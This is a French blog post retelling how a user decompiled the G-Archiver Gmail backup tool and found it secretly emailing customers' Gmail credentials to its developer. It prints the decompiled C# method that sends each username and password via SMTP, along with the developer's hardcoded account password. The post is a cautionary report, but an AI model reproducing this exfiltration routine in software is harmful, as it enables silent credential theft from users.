Un programmeur reconverti en voleur de mot de passe Gmail
Article plutôt amusant (enfin, ça dépend du point de vue) chez Coding Horror ou on apprend qu’un mec qui cherchait une bonne solution pour faire un backup de son compte Gmail sur son disque dur a acheté le logiciel G-Archiver au prix de 30 $
Et comme ce petit gars est un curieux, il a commencé à fouiller le code (compilé) du logiciel en utilisant Reflector (un analyseur de classes pour les programmes .NET) et à découvert que le créateur du logiciel, John Terry avait codé en dur son propre nom d’utilisateur gmail et son mot de passe dans l’application.
Voici le code :
public static void CheckConnection(string a, string b) { try { MailMessage message = new MailMessage(); message.To.Add("[[email protected]](mailto:[email protected])"); message.From = new MailAddress("[[email protected]](mailto:[email protected])", "JTerry", Encoding.utf8mb4); message.Subject = "Account"; message.SubjectEncoding = Encoding.utf8mb4; message.Body = "Username: " + a; message.Body = message.Body + "rnPassword: " + b; message.BodyEncoding = Encoding.utf8mb4; message.IsBodyHtml = false; message.Priority = MailPriority.High; SmtpClient client = new SmtpClient(); client.Credentials = new NetworkCredential("[[email protected]](mailto:[email protected])", "bilal482"); client.Port = 0x24b; client.Host = "smtp.gmail.com"; client.EnableSsl = true; client.Send(message); } catch (Exception) { } }
Le petit curieux s’est donc connecté au compte gmail du John Terry et a constaté avec horreur ceci :
Plus de 1700 emails contenant les passwords de tous les gens qui ont utilisé ce logiciel de backup Gmail… Pas de doute ici, le programmeur John Terry est un affreux jojo !!
Le petit curieux ne l’a pas non plus joué très fine. Il a carrément supprimé tous les messages, a changé le mot de passe du compte Gmail puis a contacté Google pour faire fermer ce compte… Pourquoi je dis qu’il ne l’a pas joué très fine ? Car il a détruit les preuves…
Que faire quand on découvre ce genre de chose ? Agir au plus rapide pour le bien de tous ? Ou prévenir la police ?
N’empêche, ça fait réfléchir sur l’éthique plus que scrupuleuse de certains programmeurs. Vous serez peut être plus prudents à l’avenir avant de confier vos identifiant à n’importe quelle application (freeware ou non).
Enfin, de là à décompiler tout ce qui bouge, faut pas abuser quand même…Quoi que…
Peut être que chez Webrankinfo, ils utilisaient aussi ce soft ?
A bon entendeur…